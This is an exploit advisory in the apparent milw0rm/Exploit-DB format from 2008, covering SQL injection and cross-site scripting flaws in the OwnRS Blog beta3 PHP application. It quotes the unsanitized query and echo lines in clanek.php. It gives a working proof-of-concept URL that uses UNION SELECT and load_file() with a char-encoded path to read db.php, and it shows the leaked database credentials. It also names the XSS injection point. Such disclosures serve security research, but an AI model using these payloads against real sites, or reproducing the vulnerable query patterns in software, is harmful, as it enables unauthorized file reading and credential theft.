OwnRS blog beta3 - SQL Injection / Cross-Site Scripting

EDB-ID:

5860




Platform:

PHP

Date:

2008-06-19


==============================================================
  OwnRS Blog beta3 (SQL/XSS) Multiple Remote Vulnerabilities
==============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 19 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : OwnRS
 VERSION     : Beta3
 VENDOR	     : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/ownrs
#####################################################

--- Remote SQL Injection ---

**magic_quote must turn off**

------------------------------
 Vulnerable File (clanek.php)
------------------------------

@ Line 66

[+] $vysledek=mysql_query("select * from clanky where id= '" . $id . "'") or die (mysql_error());

----------
 Exploit
----------

[+] http://[Target]/[Ownrs_path]/clanek.php?id=[SQL Injection]

-------------
 POC Exploit
-------------

[+] http://localhost/own/clanek.php?id=1'/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(char(67,58,92,120,97,109,112,112,92,104,116,100,111,99,115,92,79,119,110,92,100,98,46,112,104,112)),4,5,6,7,8,9,10/**/FROM/**/autori/**/WHERE/**/id='1

When you view source, You can see

@Line 87

[+] <h1><a href="clanek.php?id=1'/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(char(67,58,92,120,97,109,112,112,92,104,116,100,111,99,115,92,79,119,110,92,100,98,46,112,104,112)),4,5,6,7,8,9,10/**/FROM/**/autori/**/WHERE/**/id='1"><?php
[+] $spojeni= mysql_connect(
[+] //server
[+] "localhost",
[+] //login
[+] "xampp",
[+] //heslo
[+] "xampp" );
[+] //databáze
[+] mysql_select_db("databaze",$spojeni);
[+] ?>
[+] </a></h1>
[+] 45<p class="right"><strong><a href="index.php?kat=9">
[+] <div class="cara"><span class="schovat">cara</span></div>
      

---------------------
 Exploit Description
---------------------

    This exploit use load_file() to view source files (load_file() can only use with Mysql5+)

load_file(char(67,58,92,120,97,109,112,112,92,104,116,100,111,99,115,92,79,119,110,92,100,98,46,112,104,112))
will open C:\xampp\htdocs\Own\db.php


--- Remote XSS Exploit ---

------------------------------
 Vulnerable File (clanek.php)
------------------------------

@ Line 69

[+] <h1><a href="clanek.php?id=<?echo $id?>"><?echo $zaznam["nadpis"]?></a></h1>

---------
 Exploit
---------

[+] http://[Target]/[Ownrs_path]/clanek.php?id=<XSS>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-19]